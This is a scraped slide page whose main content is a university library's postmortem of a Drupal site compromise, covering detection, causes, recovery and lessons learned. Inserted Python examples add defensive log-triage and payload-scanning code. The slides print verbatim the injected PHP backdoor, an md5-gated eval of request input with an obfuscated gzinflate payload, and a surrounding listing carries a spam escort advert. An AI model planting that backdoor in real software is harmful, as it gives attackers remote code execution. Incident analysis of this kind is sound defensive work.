Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 

Último (20)

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...

Anatomy of a Drupal Hack - TechKnowFile 2014

  • 1. Anatomy of a Drupal Hack Graham Stewart Network and Storage Services Manager Bilal Khalid Senior Application Developer University of Toronto Libraries
  • 2. ITS at University of Toronto Libraries => wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community. => develop and maintain digital collections and web-based resources => upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012 Photo: Gordon Belray
  • 6. Not just hardware ... Collaborative environment between: - programmers / developers / designers - librarians - sysadmins / operations Technology environment: - open source tools - Linux (Ubuntu, Redhat), KVM
  • 7. … and we’re hiring !
  • 16. [Drupal @UTL architecture diagram] Load balancing: HAProxy / Keepalived (x2, IP); Application and caching: Varnish, APC, Apache & PHP (x4); Memcached / Keepalived (x2, IP); Database: MySQL (x2, IP); Storage or rsync
  • 19. 12:18 “Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
  • 22. Symptom or root problem? Chef ? MySQL error? Restart Apache? Restart server? Recent OS updates? PHP versions? Drupal Customizations? Anything updated in Drupal? Hacked !?#%$&!
  • 23. Detection - apache log analysis - looked for odd traffic patterns - in particular, isolated all wp-conf requests - “hack” attempt started a couple of weeks before - successful injection occurred the day before
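Added example (not from the slides): the log triage the Detection slide describes, run over constructed Apache access-log lines. It groups the indicator hits named on the slides (wp-conf probes, PHP served out of sites/default/files, the injected snippet's "ch" parameter) by client IP with first/last seen, which is how the "probing weeks before, injection the day before" timeline is recovered; the log format and sample IPs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache common/combined access-log line (assumption: the servers log in this format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Indicators drawn from the incident as the slides describe it: wp-conf probes,
# PHP served out of the upload directory, and the injected snippet's "ch" parameter.
INDICATORS = {
    "wp-conf probe": re.compile(r"wp-conf", re.I),
    "php under sites/default/files": re.compile(r"^/sites/default/files/.*\.php(\?|$)", re.I),
    "'ch' parameter": re.compile(r"[?&]ch="),
}
# Constructed sample log lines; not traffic from the real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Feb/2013:03:12:44 -0500] "GET /wp-config.php HTTP/1.1" 404 212
203.0.113.7 - - [01/Feb/2013:03:12:45 -0500] "GET /blog/wp-config.php.bak HTTP/1.1" 404 212
198.51.100.23 - - [02/Feb/2013:10:01:02 -0500] "GET /node/12 HTTP/1.1" 200 8812
198.51.100.23 - - [02/Feb/2013:10:01:09 -0500] "GET /sites/default/files/report.pdf HTTP/1.1" 200 40211
203.0.113.7 - - [13/Feb/2013:22:40:10 -0500] "POST /sites/default/files/pictures/x.php HTTP/1.1" 200 5
203.0.113.7 - - [13/Feb/2013:22:41:55 -0500] "GET /sites/default/files/pictures/x.php?ch=1 HTTP/1.1" 200 0
"""

def parse_line(line):
    # Returns the parsed fields of one log line, or None when it is not in the expected format.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def triage(log_text):
    # Group indicator hits by client IP with first/last seen, so the timeline falls out of the log.
    by_ip = defaultdict(lambda: {"hits": 0, "first": None, "last": None,
                                 "reasons": set(), "requests": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = [name for name, rx in INDICATORS.items() if rx.search(rec["target"])]
        if not reasons:
            continue
        s = by_ip[rec["ip"]]
        s["hits"] += 1
        s["first"] = rec["when"] if s["first"] is None else min(s["first"], rec["when"])
        s["last"] = rec["when"] if s["last"] is None else max(s["last"], rec["when"])
        s["reasons"].update(reasons)
        s["requests"].append((rec["ts"], rec["method"], rec["target"], rec["status"]))
    return dict(by_ip)
```

Pointing triage() at a real access log (one file per day, then merged) gives one row per source with the span between first probe and last hit; the benign 198.51.100.23 traffic never appears.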
  • 24. Exploit... FCKEditor Bug - allows XSS attacks Sources: https://drupal.org/node/1482528 http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload.com/exploit/na/drupal-fckeditorckeditor-php-execution
  • 25. … + PHP Execution... PHP Filter Module - core module that allows ‘client’ PHP execution - disabled by default
  • 26. … + Permission issues... Incorrect rwx permissions for sites/default/files - allowed user uploaded files to be executable by www-data - www-data also had write permissions to /var/www!
  • 27. … = Code Injection
  Snippet found inserted at the top of random PHP files throughout the site:

      if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) {
          eval($_REQUEST['php_code']);
          exit();
      }
      eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1PQyE0xxZSwtVVQT01JMUwxM00xNzIzMzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA')));

  Reversing gzinflate:
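Added example (not from the slides): a scanner for the injection shown above, usable both to find affected PHP files across a docroot and to do the "reversing gzinflate" step statically. PHP's gzinflate() is raw DEFLATE, so zlib with wbits=-15 unpacks each eval(gzinflate(base64_decode())) layer without ever executing it; pack_sample() only builds a constructed fixture in the snippet's shape, with an all-zero placeholder hash, so the scanner can be exercised offline.

```python
import base64
import re
import zlib
from pathlib import Path

# Markers of the injected snippet as the slides show it: an md5-gated eval of
# $_REQUEST['php_code'] and an eval(gzinflate(base64_decode('...'))) wrapper.
GATE_RE = re.compile(r"md5\(\s*\$_REQUEST\[['\"]ch['\"]\]\s*\)\s*==\s*'([0-9a-f]{32})'")
PACKED_RE = re.compile(r"eval\(\s*gzinflate\(\s*base64_decode\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)\s*\)\s*\)")

def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() is raw DEFLATE: zlib with no header, hence wbits=-15."""
    return zlib.decompress(data, -15)

def unpack_layers(src: str, max_layers: int = 10) -> list:
    """Statically peel eval(gzinflate(base64_decode())) wrappers; nothing is executed."""
    layers = []
    for _ in range(max_layers):
        m = PACKED_RE.search(src)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))  # slides and droppers often wrap the blob
        try:
            src = gzinflate(base64.b64decode(blob)).decode("utf-8", "replace")
        except (zlib.error, ValueError):
            break
        layers.append(src)
    return layers

def inspect_php(src: str) -> dict:
    gate = GATE_RE.search(src)
    return {"gate_hash": gate.group(1) if gate else None,
            "eval_request": bool(re.search(r"eval\(\s*\$_REQUEST\[", src)),
            "layers": unpack_layers(src)}

def scan_tree(root) -> dict:
    """Walk a docroot and report PHP files carrying any of the markers."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        info = inspect_php(path.read_text(errors="replace"))
        if info["gate_hash"] or info["eval_request"] or info["layers"]:
            findings[str(path)] = info
    return findings

def pack_sample(inner: str) -> str:
    """CONSTRUCTED test fixture in the shape of the page's snippet (placeholder hash)."""
    comp = zlib.compressobj(wbits=-15)
    blob = base64.b64encode(comp.compress(inner.encode()) + comp.flush()).decode()
    return ("<?php if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '" + "0" * 32
            + "') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } "
            "eval(gzinflate(base64_decode('" + blob + "'))); ?>")
```

On a live docroot, run scan_tree() against a read-only copy of the site and diff the findings against a known-good checkout; the md5 gate hash is a stable signature across every file the same dropper touched.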
  • 29. Risk Exposure - hijack/deface site - ransomware => blackmail - host their own content - execute phishing attacks - gain access to other sites on server (if any) - exploit OS vulnerabilities
  • 30. Risk Exposure - use Drupal’s settings.php to gain access to the database/salt - harvest public/private site content - access personal user information (including passwords!!) - access other dbs/sites if they use the same credentials
  • 31. The Recovery - Restoration - restored site from a couple of days prior - all servers are backed up nightly (incl. files and db) - at most 48 hours of data loss - correct file-system permissions - disabled FCKEditor, PHP Filter modules - reset Drupal admin password - changed all site users’ passwords
  • 32. The Recovery - Communication - contacted all potentially affected site members - clear, honest communication - possibility of personal information being leaked - possibility passwords might have been compromised - do users use same passwords for other services?
  • 33. Lessons Learned - Drupal - first real Drupal problem - follow Drupal security guidelines! - https://drupal.org/security/secure-configuration - vet the required core, contrib and custom modules for project - stay on top of the updates - test patches and updates and implement rapidly - use https for all secure pages (whenever possible) - install security modules - Security Review, Security Kit, Login Security, ... - if developing, use Drupal’s built-in checking functions
  • 34. Lessons Learned - Operational - review site security policies - enforcement: periodic security sweeps - tight control on production environments - protect the core code with version control - use https whenever authentication is involved - mod_security to block attacks - establish security analysis practices - metrics - traffic analysis - log triggers and notifications
  • 35. Embrace Failure - Failure rarely has a single cause: - systems are very complex, many interdependencies - answers are not necessarily obvious - weakness can be latent, triggered by other flaws - red herrings - swiss cheese
  • 36. Source: John Allspaw: Advanced PostMortem Fu and Human Error 101 http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101-velocity-2011
  • 37. Lessons Learned - Cultural - Everyone must have the organization’s end goals in mind - Team of experts or team of poly-skilled polyglots? - Emergency roles may differ from normal roles - Emergency communication channels must be defined - Failure rehearsals: deliberately break things: - The culture must be free of blame